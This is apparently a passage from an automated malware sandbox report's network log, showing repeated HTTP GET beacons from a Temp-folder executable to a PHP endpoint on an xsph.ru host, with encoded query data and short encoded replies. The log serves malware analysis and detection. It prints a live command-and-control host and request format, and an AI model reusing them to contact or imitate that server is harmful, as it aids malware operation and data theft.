                Jan 2, 2025 05:18:26.821595907 CET264INHTTP/1.1 200 OK
                Server: openresty
                Date: Thu, 02 Jan 2025 04:18:26 GMT
                Content-Type: text/html; charset=UTF-8
                Content-Length: 104
                Connection: keep-alive
                Data Raw: 3d 3d 51 66 39 4a 69 49 36 49 69 5a 6c 52 47 5a 34 51 47 5a 34 59 32 4d 32 63 44 4f 7a 63 54 5a 31 59 57 4d 69 46 54 4e 6d 56 6d 59 34 6b 7a 4e 6c 5a 54 4f 34 49 79 65 36 49 79 59 7a 67 6a 5a 33 6b 7a 59 6b 46 54 4f 33 51 44 4d 35 6b 7a 59 68 56 7a 59 79 51 6a 59 7a 49 54 5a 34 49 7a 4e 34 51 32 4e 30 49 79 65
                Data Ascii: ==Qf9JiI6IiZlRGZ4QGZ4Y2M2cDOzcTZ1YWMiFTNmVmY4kzNlZTO4Iye6IyYzgjZ3kzYkFTO3QDM5kzYhVzYyQjYzITZ4IzN4Q2N0Iye


                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                16192.168.2.549992141.8.192.151805688C:\Users\user\AppData\Local\Temp\ComponentfontintoDll\Bridgecontainer.exe
                TimestampBytes transferredDirectionData
                Jan 2, 2025 05:18:31.840255022 CET2206OUTGET /L1nc0In.php?0wJqWIDeGKE5HMQaW9=bgMnNKcplpYN4rS0hE0df6QIvg3&NRe4zqCBoI6g4dbyr6KOyWs=ffVfPD2qQtbU&dYNpRMZ=UjCec&b59daed131a5b229758cb5fca4b11528=gM4UzMyMGNlZmMlRzNmVzMmFGZzMjM4EjNyATN0QGO2kDMiRzNmRDNwgjN4kzN2QDMzIjN1gjM&0ba6e725790744febcc21ebe8d80c3a7=QN4YDOzAzMhFWYiZTMwIzNhFWM5MjNlRmY5cTN2IWO1UTNmZWZmJGZ&70fd1f4e39497cfa4a2ef86106a65a1e=d1nImhzMmFjM3EGMjFDO3gzN5I2YzcjZ1E2YwMTNykjN4IDMmNWM0kzN2IiOiY2N1ITY5gTM4UDOxQDMmZ2MykzM2YjZ2ITNzcTNwUzMiwiI2QmZ3gTMyQzYyczMkR2MxY2MxgjYwQmYiFmM4UWN2MzMmVTZiJWYlJiOiEjZhlTZiN2MwkjNlNDMlVWZzQzNjRTY1EGNiFzNihTZis3W&ce168cbd002dff8b283ef206741c0917=d1nIiojI0EWZiVTYzATYmVWZlRjZlRWZwgzY4ITOhdTY3EWOmJmIsIiZ4MjZxIzNhBzYxgzN4cTOiN2M3YWNhNGMzUjM5YDOyAjZjFDN5cjNiojImdTNyEWO4EDO1gTM0AjZmNjM5MjN2YmNyUzM3UDM1MjIsIiNkZ2N4EjM0MmM3MDZkNTMmNTM4IGMkJmYhJDOlVjNzMjZ1UmYiFWZiojIxYWY5UmYjNDM5YTZzATZlV2M0czY0EWNhRjYxcjY4UmI7xSfiElZx8maJBjVzIGbxcVYVJEWaxGeyUVa3lWSuVzVhdnVXp1cOxWS2kUejFjUYlFMOZVZwwWbkBnUzklQKNETplUaPl2YzI2a1cVYYJVMRJkSDxUa0sWS2k0UihmTtlFbkFzYwp0QMl2aslkNJNlW1lzRhdXOtNmasdFV6xWbJN [TRUNCATED]
                Accept: */*
                Content-Type: text/html
                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34
                Host: f1069581.xsph.ru
                Jan 2, 2025 05:18:32.523602962 CET264INHTTP/1.1 200 OK
                Server: openresty
                Date: Thu, 02 Jan 2025 04:18:32 GMT
                Content-Type: text/html; charset=UTF-8
                Content-Length: 104
                Connection: keep-alive
                Data Raw: 3d 3d 51 66 39 4a 69 49 36 49 69 5a 6c 52 47 5a 34 51 47 5a 34 59 32 4d 32 63 44 4f 7a 63 54 5a 31 59 57 4d 69 46 54 4e 6d 56 6d 59 34 6b 7a 4e 6c 5a 54 4f 34 49 79 65 36 49 79 59 7a 67 6a 5a 33 6b 7a 59 6b 46 54 4f 33 51 44 4d 35 6b 7a 59 68 56 7a 59 79 51 6a 59 7a 49 54 5a 34 49 7a 4e 34 51 32 4e 30 49 79 65
                Data Ascii: ==Qf9JiI6IiZlRGZ4QGZ4Y2M2cDOzcTZ1YWMiFTNmVmY4kzNlZTO4Iye6IyYzgjZ3kzYkFTO3QDM5kzYhVzYyQjYzITZ4IzN4Q2N0Iye


                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                17192.168.2.549993141.8.192.151805688C:\Users\user\AppData\Local\Temp\ComponentfontintoDll\Bridgecontainer.exe
                TimestampBytes transferredDirectionData
                Jan 2, 2025 05:18:33.110641956 CET827OUTGET /L1nc0In.php?0wJqWIDeGKE5HMQaW9=bgMnNKcplpYN4rS0hE0df6QIvg3&NRe4zqCBoI6g4dbyr6KOyWs=ffVfPD2qQtbU&dYNpRMZ=UjCec&b59daed131a5b229758cb5fca4b11528=gM4UzMyMGNlZmMlRzNmVzMmFGZzMjM4EjNyATN0QGO2kDMiRzNmRDNwgjN4kzN2QDMzIjN1gjM&0ba6e725790744febcc21ebe8d80c3a7=QN4YDOzAzMhFWYiZTMwIzNhFWM5MjNlRmY5cTN2IWO1UTNmZWZmJGZ&ce168cbd002dff8b283ef206741c0917=0VfiIiOiQTYlJWNhNDMhZWZlVGNmVGZlBDOjhjM5E2NhdTY5YmYiwiIlhDZlVTYlRDOyUzMmZWM2QGOzMGOzATN4cDN4MjMiNzY2UGMzUGOxIiOiY2N1ITY5gTM4UDOxQDMmZ2MykzM2YjZ2ITNzcTNwUzMiwiI2QmZ3gTMyQzYyczMkR2MxY2MxgjYwQmYiFmM4UWN2MzMmVTZiJWYlJiOiEjZhlTZiN2MwkjNlNDMlVWZzQzNjRTY1EGNiFzNihTZis3W HTTP/1.1
                Accept: */*
                Content-Type: text/html
                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34
                Host: f1069581.xsph.ru
                Jan 2, 2025 05:18:33.804224014 CET158INHTTP/1.1 200 OK
                Server: openresty
                Date: Thu, 02 Jan 2025 04:18:33 GMT
                Content-Type: text/html; charset=UTF-8
                Content-Length: 0
                Connection: keep-alive


                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                18192.168.2.549994141.8.192.151805688C:\Users\user\AppData\Local\Temp\ComponentfontintoDll\Bridgecontainer.exe
                TimestampBytes transferredDirectionData
                Jan 2, 2025 05:18:33.813539028 CET1452OUTGET /L1nc0In.php?0wJqWIDeGKE5HMQaW9=bgMnNKcplpYN4rS0hE0df6QIvg3&NRe4zqCBoI6g4dbyr6KOyWs=ffVfPD2qQtbU&dYNpRMZ=UjCec&b59daed131a5b229758cb5fca4b11528=gM4UzMyMGNlZmMlRzNmVzMmFGZzMjM4EjNyATN0QGO2kDMiRzNmRDNwgjN4kzN2QDMzIjN1gjM&0ba6e725790744febcc21ebe8d80c3a7=QN4YDOzAzMhFWYiZTMwIzNhFWM5MjNlRmY5cTN2IWO1UTNmZWZmJGZ&154d77d402106dff3d2a63610a8c9212=d1nIw4WSzh3RSZnUuJGcS5mY2p1RkVnVtJmdChlY25URYNmQYJGbSZEWjh3VZpWOHR1Y4ZVWwY0RSdnQYF1Y4FzY1lTbaNnRHh1YO52Ys5EWWNGes9ERKl2Tpd2RkhmQsl0cJlmYzkTbiJXNXZVavpWSvJFWZFlUtNmdOJzYwJ1aJNXSplkNJNUYwY0RVRnRtNmbWdkYsJFbJNXSplkNJl3Y3JEWRRnRXpFMOxWSzlUaiNTOtJmc1clVp9maJVEbrNGbOhlV0Z0VaBjTsl0cJlmYzkTbiJXNXZVavpWS5ZlMjZVMXlFbSNTVpdXaJVHZzIWd01mYWpUaPl2YtJGa4VlYoZ1RkRlSDxUa0IDZ2VjMhVnVslkNJNUYwY0RVRnRXpFMOxWSzl0UZJTSXlFdBR0TyklaOBTQql1N1MlZ3FERNdXQE10dBpGT4RzQNVXQ6VWavpWS6ZVbiZHaHNmdKNTWwFzaJNXSplkNJl3Y0ZkMZlmVyYVa3lWS1hHbjNmRUdlQ4VUVUxWRSNGesx0Y4ZEWjpUaPlWTuJGbW12Yq5EbJNXS5tEN0MkTp9maJVXOXFmeKhlWXRXbjZHZYpFdG12YHpUelJiOiQTYlJWNhNDMhZWZlVGNmVGZlBDOjhjM5E2NhdTY5YmYiwiIlhDZlVTYlRDOyUzMmZWM2QGO [TRUNCATED]
                Accept: */*
                Content-Type: text/html
                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34
                Host: f1069581.xsph.ru
                Connection: Keep-Alive
                Jan 2, 2025 05:18:34.520953894 CET158INHTTP/1.1 200 OK
                Server: openresty
                Date: Thu, 02 Jan 2025 04:18:34 GMT
                Content-Type: text/html; charset=UTF-8
                Content-Length: 0
                Connection: keep-alive


                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                19192.168.2.549995141.8.192.151805688C:\Users\user\AppData\Local\Temp\ComponentfontintoDll\Bridgecontainer.exe
                TimestampBytes transferredDirectionData
                Jan 2, 2025 05:18:37.547410965 CET2233OUTGET /L1nc0In.php?0wJqWIDeGKE5HMQaW9=bgMnNKcplpYN4rS0hE0df6QIvg3&NRe4zqCBoI6g4dbyr6KOyWs=ffVfPD2qQtbU&dYNpRMZ=UjCec&b59daed131a5b229758cb5fca4b11528=gM4UzMyMGNlZmMlRzNmVzMmFGZzMjM4EjNyATN0QGO2kDMiRzNmRDNwgjN4kzN2QDMzIjN1gjM&0ba6e725790744febcc21ebe8d80c3a7=QN4YDOzAzMhFWYiZTMwIzNhFWM5MjNlRmY5cTN2IWO1UTNmZWZmJGZ&70fd1f4e39497cfa4a2ef86106a65a1e=d1nImhzMmFjM3EGMjFDO3gzN5I2YzcjZ1E2YwMTNykjN4IDMmNWM0kzN2IiOiY2N1ITY5gTM4UDOxQDMmZ2MykzM2YjZ2ITNzcTNwUzMiwiI2QmZ3gTMyQzYyczMkR2MxY2MxgjYwQmYiFmM4UWN2MzMmVTZiJWYlJiOiEjZhlTZiN2MwkjNlNDMlVWZzQzNjRTY1EGNiFzNihTZis3W&ce168cbd002dff8b283ef206741c0917=0VfiIiOiQTYlJWNhNDMhZWZlVGNmVGZlBDOjhjM5E2NhdTY5YmYiwiImhzMmFjM3EGMjFDO3gzN5I2YzcjZ1E2YwMTNykjN4IDMmNWM0kzN2IiOiY2N1ITY5gTM4UDOxQDMmZ2MykzM2YjZ2ITNzcTNwUzMiwiI2QmZ3gTMyQzYyczMkR2MxY2MxgjYwQmYiFmM4UWN2MzMmVTZiJWYlJiOiEjZhlTZiN2MwkjNlNDMlVWZzQzNjRTY1EGNiFzNihTZisHL9JSUmFzbqlEMWNjYsFzVhVlQYpFb4JTVpdXaJ5WNXF2dWdlWz5EbJZTS5NWMShVWw4kVlBDbtRGcSNTWCp0QMlWSYplbG1mYoFTRJRnRtNmb502YRpUaPl2YzI2a1cVYYJVMRJkSDxUa0sWS2k0UihmTtlFbkFzYwp0QMl2aslk [TRUNCATED]
                Accept: */*
                Content-Type: text/html
                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34
                Host: f1069581.xsph.ru
                Jan 2, 2025 05:18:38.231367111 CET264INHTTP/1.1 200 OK
                Server: openresty
                Date: Thu, 02 Jan 2025 04:18:38 GMT
                Content-Type: text/html; charset=UTF-8
                Content-Length: 104
                Connection: keep-alive
                Data Raw: 3d 3d 51 66 39 4a 69 49 36 49 69 5a 6c 52 47 5a 34 51 47 5a 34 59 32 4d 32 63 44 4f 7a 63 54 5a 31 59 57 4d 69 46 54 4e 6d 56 6d 59 34 6b 7a 4e 6c 5a 54 4f 34 49 79 65 36 49 79 59 7a 67 6a 5a 33 6b 7a 59 6b 46 54 4f 33 51 44 4d 35 6b 7a 59 68 56 7a 59 79 51 6a 59 7a 49 54 5a 34 49 7a 4e 34 51 32 4e 30 49 79 65
                Data Ascii: ==Qf9JiI6IiZlRGZ4QGZ4Y2M2cDOzcTZ1YWMiFTNmVmY4kzNlZTO4Iye6IyYzgjZ3kzYkFTO3QDM5kzYhVzYyQjYzITZ4IzN4Q2N0Iye


                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                20192.168.2.549996141.8.192.151805688C:\Users\user\AppData\Local\Temp\ComponentfontintoDll\Bridgecontainer.exe
                TimestampBytes transferredDirectionData
                Jan 2, 2025 05:18:43.247786045 CET2257OUTGET /L1nc0In.php?0wJqWIDeGKE5HMQaW9=bgMnNKcplpYN4rS0hE0df6QIvg3&NRe4zqCBoI6g4dbyr6KOyWs=ffVfPD2qQtbU&dYNpRMZ=UjCec&b59daed131a5b229758cb5fca4b11528=gM4UzMyMGNlZmMlRzNmVzMmFGZzMjM4EjNyATN0QGO2kDMiRzNmRDNwgjN4kzN2QDMzIjN1gjM&0ba6e725790744febcc21ebe8d80c3a7=QN4YDOzAzMhFWYiZTMwIzNhFWM5MjNlRmY5cTN2IWO1UTNmZWZmJGZ&70fd1f4e39497cfa4a2ef86106a65a1e=d1nImhzMmFjM3EGMjFDO3gzN5I2YzcjZ1E2YwMTNykjN4IDMmNWM0kzN2IiOiY2N1ITY5gTM4UDOxQDMmZ2MykzM2YjZ2ITNzcTNwUzMiwiI2QmZ3gTMyQzYyczMkR2MxY2MxgjYwQmYiFmM4UWN2MzMmVTZiJWYlJiOiEjZhlTZiN2MwkjNlNDMlVWZzQzNjRTY1EGNiFzNihTZis3W&ce168cbd002dff8b283ef206741c0917=0VfiIiOiQTYlJWNhNDMhZWZlVGNmVGZlBDOjhjM5E2NhdTY5YmYiwiImhzMmFjM3EGMjFDO3gzN5I2YzcjZ1E2YwMTNykjN4IDMmNWM0kzN2IiOiY2N1ITY5gTM4UDOxQDMmZ2MykzM2YjZ2ITNzcTNwUzMiwiI2QmZ3gTMyQzYyczMkR2MxY2MxgjYwQmYiFmM4UWN2MzMmVTZiJWYlJiOiEjZhlTZiN2MwkjNlNDMlVWZzQzNjRTY1EGNiFzNihTZisHL9JSUmFzbqlEMWNjYsFzVhVlQYpFb4JTVpdXaJ5WNXF2dWdlWz5EbJZTS5NWMShVWw4kVlBDbtRGcSNTWCp0QMlWSYplbG1mYoFTRJRnRtNmb502YRpUaPl2YzI2a1cVYYJVMRJkSDxUa0sWS2k0UihmTtlFbkFzYwp0QMl2aslk [TRUNCATED]
                Accept: */*
                Content-Type: text/html
                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34
                Host: f1069581.xsph.ru
                Connection: Keep-Alive
                Jan 2, 2025 05:18:43.971126080 CET264INHTTP/1.1 200 OK
                Server: openresty
                Date: Thu, 02 Jan 2025 04:18:43 GMT
                Content-Type: text/html; charset=UTF-8
                Content-Length: 104
                Connection: keep-alive
                Data Raw: 3d 3d 51 66 39 4a 69 49 36 49 69 5a 6c 52 47 5a 34 51 47 5a 34 59 32 4d 32 63 44 4f 7a 63 54 5a 31 59 57 4d 69 46 54 4e 6d 56 6d 59 34 6b 7a 4e 6c 5a 54 4f 34 49 79 65 36 49 79 59 7a 67 6a 5a 33 6b 7a 59 6b 46 54 4f 33 51 44 4d 35 6b 7a 59 68 56 7a 59 79 51 6a 59 7a 49 54 5a 34 49 7a 4e 34 51 32 4e 30 49 79 65
                Data Ascii: ==Qf9JiI6IiZlRGZ4QGZ4Y2M2cDOzcTZ1YWMiFTNmVmY4kzNlZTO4Iye6IyYzgjZ3kzYkFTO3QDM5kzYhVzYyQjYzITZ4IzN4Q2N0Iye


                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                21192.168.2.549997141.8.192.151805688C:\Users\user\AppData\Local\Temp\ComponentfontintoDll\Bridgecontainer.exe
                TimestampBytes transferredDirectionData
                Jan 2, 2025 05:18:48.996751070 CET2257OUTGET /L1nc0In.php?0wJqWIDeGKE5HMQaW9=bgMnNKcplpYN4rS0hE0df6QIvg3&NRe4zqCBoI6g4dbyr6KOyWs=ffVfPD2qQtbU&dYNpRMZ=UjCec&b59daed131a5b229758cb5fca4b11528=gM4UzMyMGNlZmMlRzNmVzMmFGZzMjM4EjNyATN0QGO2kDMiRzNmRDNwgjN4kzN2QDMzIjN1gjM&0ba6e725790744febcc21ebe8d80c3a7=QN4YDOzAzMhFWYiZTMwIzNhFWM5MjNlRmY5cTN2IWO1UTNmZWZmJGZ&70fd1f4e39497cfa4a2ef86106a65a1e=d1nImhzMmFjM3EGMjFDO3gzN5I2YzcjZ1E2YwMTNykjN4IDMmNWM0kzN2IiOiY2N1ITY5gTM4UDOxQDMmZ2MykzM2YjZ2ITNzcTNwUzMiwiI2QmZ3gTMyQzYyczMkR2MxY2MxgjYwQmYiFmM4UWN2MzMmVTZiJWYlJiOiEjZhlTZiN2MwkjNlNDMlVWZzQzNjRTY1EGNiFzNihTZis3W&ce168cbd002dff8b283ef206741c0917=0VfiIiOiQTYlJWNhNDMhZWZlVGNmVGZlBDOjhjM5E2NhdTY5YmYiwiImhzMmFjM3EGMjFDO3gzN5I2YzcjZ1E2YwMTNykjN4IDMmNWM0kzN2IiOiY2N1ITY5gTM4UDOxQDMmZ2MykzM2YjZ2ITNzcTNwUzMiwiI2QmZ3gTMyQzYyczMkR2MxY2MxgjYwQmYiFmM4UWN2MzMmVTZiJWYlJiOiEjZhlTZiN2MwkjNlNDMlVWZzQzNjRTY1EGNiFzNihTZisHL9JSUmFzbqlEMWNjYsFzVhVlQYpFb4JTVpdXaJ5WNXF2dWdlWz5EbJZTS5NWMShVWw4kVlBDbtRGcSNTWCp0QMlWSYplbG1mYoFTRJRnRtNmb502YRpUaPl2YzI2a1cVYYJVMRJkSDxUa0sWS2k0UihmTtlFbkFzYwp0QMl2aslk [TRUNCATED]
                Accept: */*
                Content-Type: text/html
                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34
                Host: f1069581.xsph.ru
                Connection: Keep-Alive
                Jan 2, 2025 05:18:49.680490017 CET264INHTTP/1.1 200 OK
                Server: openresty
                Date: Thu, 02 Jan 2025 04:18:49 GMT
                Content-Type: text/html; charset=UTF-8
                Content-Length: 104
                Connection: keep-alive
                Data Raw: 3d 3d 51 66 39 4a 69 49 36 49 69 5a 6c 52 47 5a 34 51 47 5a 34 59 32 4d 32 63 44 4f 7a 63 54 5a 31 59 57 4d 69 46 54 4e 6d 56 6d 59 34 6b 7a 4e 6c 5a 54 4f 34 49 79 65 36 49 79 59 7a 67 6a 5a 33 6b 7a 59 6b 46 54 4f 33 51 44 4d 35 6b 7a 59 68 56 7a 59 79 51 6a 59 7a 49 54 5a 34 49 7a 4e 34 51 32 4e 30 49 79 65
                Data Ascii: ==Qf9JiI6IiZlRGZ4QGZ4Y2M2cDOzcTZ1YWMiFTNmVmY4kzNlZTO4Iye6IyYzgjZ3kzYkFTO3QDM5kzYhVzYyQjYzITZ4IzN4Q2N0Iye


                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                22192.168.2.549998141.8.192.151805688C:\Users\user\AppData\Local\Temp\ComponentfontintoDll\Bridgecontainer.exe
                TimestampBytes transferredDirectionData
                Jan 2, 2025 05:18:54.700608015 CET2233OUTGET /L1nc0In.php?0wJqWIDeGKE5HMQaW9=bgMnNKcplpYN4rS0hE0df6QIvg3&NRe4zqCBoI6g4dbyr6KOyWs=ffVfPD2qQtbU&dYNpRMZ=UjCec&b59daed131a5b229758cb5fca4b11528=gM4UzMyMGNlZmMlRzNmVzMmFGZzMjM4EjNyATN0QGO2kDMiRzNmRDNwgjN4kzN2QDMzIjN1gjM&0ba6e725790744febcc21ebe8d80c3a7=QN4YDOzAzMhFWYiZTMwIzNhFWM5MjNlRmY5cTN2IWO1UTNmZWZmJGZ&70fd1f4e39497cfa4a2ef86106a65a1e=d1nImhzMmFjM3EGMjFDO3gzN5I2YzcjZ1E2YwMTNykjN4IDMmNWM0kzN2IiOiY2N1ITY5gTM4UDOxQDMmZ2MykzM2YjZ2ITNzcTNwUzMiwiI2QmZ3gTMyQzYyczMkR2MxY2MxgjYwQmYiFmM4UWN2MzMmVTZiJWYlJiOiEjZhlTZiN2MwkjNlNDMlVWZzQzNjRTY1EGNiFzNihTZis3W&ce168cbd002dff8b283ef206741c0917=0VfiIiOiQTYlJWNhNDMhZWZlVGNmVGZlBDOjhjM5E2NhdTY5YmYiwiImhzMmFjM3EGMjFDO3gzN5I2YzcjZ1E2YwMTNykjN4IDMmNWM0kzN2IiOiY2N1ITY5gTM4UDOxQDMmZ2MykzM2YjZ2ITNzcTNwUzMiwiI2QmZ3gTMyQzYyczMkR2MxY2MxgjYwQmYiFmM4UWN2MzMmVTZiJWYlJiOiEjZhlTZiN2MwkjNlNDMlVWZzQzNjRTY1EGNiFzNihTZisHL9JSUmFzbqlEMWNjYsFzVhVlQYpFb4JTVpdXaJ5WNXF2dWdlWz5EbJZTS5NWMShVWw4kVlBDbtRGcSNTWCp0QMlWSYplbG1mYoFTRJRnRtNmb502YRpUaPl2YzI2a1cVYYJVMRJkSDxUa0sWS2k0UihmTtlFbkFzYwp0QMl2aslk [TRUNCATED]
                Accept: */*
                Content-Type: text/html
                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34
                Host: f1069581.xsph.ru
                Jan 2, 2025 05:18:55.375226021 CET264INHTTP/1.1 200 OK
                Server: openresty
                Date: Thu, 02 Jan 2025 04:18:55 GMT
                Content-Type: text/html; charset=UTF-8
                Content-Length: 104
                Connection: keep-alive
                Data Raw: 3d 3d 51 66 39 4a 69 49 36 49 69 5a 6c 52 47 5a 34 51 47 5a 34 59 32 4d 32 63 44 4f 7a 63 54 5a 31 59 57 4d 69 46 54 4e 6d 56 6d 59 34 6b 7a 4e 6c 5a 54 4f 34 49 79 65 36 49 79 59 7a 67 6a 5a 33 6b 7a 59 6b 46 54 4f 33 51 44 4d 35 6b 7a 59 68 56 7a 59 79 51 6a 59 7a 49 54 5a 34 49 7a 4e 34 51 32 4e 30 49 79 65
                Data Ascii: ==Qf9JiI6IiZlRGZ4QGZ4Y2M2cDOzcTZ1YWMiFTNmVmY4kzNlZTO4Iye6IyYzgjZ3kzYkFTO3QDM5kzYhVzYyQjYzITZ4IzN4Q2N0Iye


                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                23192.168.2.549999141.8.192.151805688C:\Users\user\AppData\Local\Temp\ComponentfontintoDll\Bridgecontainer.exe
                TimestampBytes transferredDirectionData
                Jan 2, 2025 05:19:00.390961885 CET2233OUTGET /L1nc0In.php?0wJqWIDeGKE5HMQaW9=bgMnNKcplpYN4rS0hE0df6QIvg3&NRe4zqCBoI6g4dbyr6KOyWs=ffVfPD2qQtbU&dYNpRMZ=UjCec&b59daed131a5b229758cb5fca4b11528=gM4UzMyMGNlZmMlRzNmVzMmFGZzMjM4EjNyATN0QGO2kDMiRzNmRDNwgjN4kzN2QDMzIjN1gjM&0ba6e725790744febcc21ebe8d80c3a7=QN4YDOzAzMhFWYiZTMwIzNhFWM5MjNlRmY5cTN2IWO1UTNmZWZmJGZ&70fd1f4e39497cfa4a2ef86106a65a1e=d1nImhzMmFjM3EGMjFDO3gzN5I2YzcjZ1E2YwMTNykjN4IDMmNWM0kzN2IiOiY2N1ITY5gTM4UDOxQDMmZ2MykzM2YjZ2ITNzcTNwUzMiwiI2QmZ3gTMyQzYyczMkR2MxY2MxgjYwQmYiFmM4UWN2MzMmVTZiJWYlJiOiEjZhlTZiN2MwkjNlNDMlVWZzQzNjRTY1EGNiFzNihTZis3W&ce168cbd002dff8b283ef206741c0917=0VfiIiOiQTYlJWNhNDMhZWZlVGNmVGZlBDOjhjM5E2NhdTY5YmYiwiImhzMmFjM3EGMjFDO3gzN5I2YzcjZ1E2YwMTNykjN4IDMmNWM0kzN2IiOiY2N1ITY5gTM4UDOxQDMmZ2MykzM2YjZ2ITNzcTNwUzMiwiI2QmZ3gTMyQzYyczMkR2MxY2MxgjYwQmYiFmM4UWN2MzMmVTZiJWYlJiOiEjZhlTZiN2MwkjNlNDMlVWZzQzNjRTY1EGNiFzNihTZisHL9JSUmFzbqlEMWNjYsFzVhVlQYpFb4JTVpdXaJ5WNXF2dWdlWz5EbJZTS5NWMShVWw4kVlBDbtRGcSNTWCp0QMlWSYplbG1mYoFTRJRnRtNmb502YRpUaPl2YzI2a1cVYYJVMRJkSDxUa0sWS2k0UihmTtlFbkFzYwp0QMl2aslk [TRUNCATED]
                Accept: */*
                Content-Type: text/html
                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34
                Host: f1069581.xsph.ru
                Jan 2, 2025 05:19:01.070681095 CET264INHTTP/1.1 200 OK
                Server: openresty
                Date: Thu, 02 Jan 2025 04:19:00 GMT
                Content-Type: text/html; charset=UTF-8
                Content-Length: 104
                Connection: keep-alive
                Data Raw: 3d 3d 51 66 39 4a 69 49 36 49 69 5a 6c 52 47 5a 34 51 47 5a 34 59 32 4d 32 63 44 4f 7a 63 54 5a 31 59 57 4d 69 46 54 4e 6d 56 6d 59 34 6b 7a 4e 6c 5a 54 4f 34 49 79 65 36 49 79 59 7a 67 6a 5a 33 6b 7a 59 6b 46 54 4f 33 51 44 4d 35 6b 7a 59 68 56 7a 59 79 51 6a 59 7a 49 54 5a 34 49 7a 4e 34 51 32 4e 30 49 79 65
                Data Ascii: ==Qf9JiI6IiZlRGZ4QGZ4Y2M2cDOzcTZ1YWMiFTNmVmY4kzNlZTO4Iye6IyYzgjZ3kzYkFTO3QDM5kzYhVzYyQjYzITZ4IzN4Q2N0Iye


                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                24192.168.2.550000141.8.192.151805688C:\Users\user\AppData\Local\Temp\ComponentfontintoDll\Bridgecontainer.exe
                TimestampBytes transferredDirectionData
                Jan 2, 2025 05:19:06.090580940 CET2257OUTGET /L1nc0In.php?0wJqWIDeGKE5HMQaW9=bgMnNKcplpYN4rS0hE0df6QIvg3&NRe4zqCBoI6g4dbyr6KOyWs=ffVfPD2qQtbU&dYNpRMZ=UjCec&b59daed131a5b229758cb5fca4b11528=gM4UzMyMGNlZmMlRzNmVzMmFGZzMjM4EjNyATN0QGO2kDMiRzNmRDNwgjN4kzN2QDMzIjN1gjM&0ba6e725790744febcc21ebe8d80c3a7=QN4YDOzAzMhFWYiZTMwIzNhFWM5MjNlRmY5cTN2IWO1UTNmZWZmJGZ&70fd1f4e39497cfa4a2ef86106a65a1e=d1nImhzMmFjM3EGMjFDO3gzN5I2YzcjZ1E2YwMTNykjN4IDMmNWM0kzN2IiOiY2N1ITY5gTM4UDOxQDMmZ2MykzM2YjZ2ITNzcTNwUzMiwiI2QmZ3gTMyQzYyczMkR2MxY2MxgjYwQmYiFmM4UWN2MzMmVTZiJWYlJiOiEjZhlTZiN2MwkjNlNDMlVWZzQzNjRTY1EGNiFzNihTZis3W&ce168cbd002dff8b283ef206741c0917=0VfiIiOiQTYlJWNhNDMhZWZlVGNmVGZlBDOjhjM5E2NhdTY5YmYiwiImhzMmFjM3EGMjFDO3gzN5I2YzcjZ1E2YwMTNykjN4IDMmNWM0kzN2IiOiY2N1ITY5gTM4UDOxQDMmZ2MykzM2YjZ2ITNzcTNwUzMiwiI2QmZ3gTMyQzYyczMkR2MxY2MxgjYwQmYiFmM4UWN2MzMmVTZiJWYlJiOiEjZhlTZiN2MwkjNlNDMlVWZzQzNjRTY1EGNiFzNihTZisHL9JSUmFzbqlEMWNjYsFzVhVlQYpFb4JTVpdXaJ5WNXF2dWdlWz5EbJZTS5NWMShVWw4kVlBDbtRGcSNTWCp0QMlWSYplbG1mYoFTRJRnRtNmb502YRpUaPl2YzI2a1cVYYJVMRJkSDxUa0sWS2k0UihmTtlFbkFzYwp0QMl2aslk [TRUNCATED]
                Accept: */*
                Content-Type: text/html
                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34
                Host: f1069581.xsph.ru
                Connection: Keep-Alive
                Jan 2, 2025 05:19:06.764190912 CET264INHTTP/1.1 200 OK
                Server: openresty
                Date: Thu, 02 Jan 2025 04:19:06 GMT
                Content-Type: text/html; charset=UTF-8
                Content-Length: 104
                Connection: keep-alive
                Data Raw: 3d 3d 51 66 39 4a 69 49 36 49 69 5a 6c 52 47 5a 34 51 47 5a 34 59 32 4d 32 63 44 4f 7a 63 54 5a 31 59 57 4d 69 46 54 4e 6d 56 6d 59 34 6b 7a 4e 6c 5a 54 4f 34 49 79 65 36 49 79 59 7a 67 6a 5a 33 6b 7a 59 6b 46 54 4f 33 51 44 4d 35 6b 7a 59 68 56 7a 59 79 51 6a 59 7a 49 54 5a 34 49 7a 4e 34 51 32 4e 30 49 79 65
                Data Ascii: ==Qf9JiI6IiZlRGZ4QGZ4Y2M2cDOzcTZ1YWMiFTNmVmY4kzNlZTO4Iye6IyYzgjZ3kzYkFTO3QDM5kzYhVzYyQjYzITZ4IzN4Q2N0Iye


                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
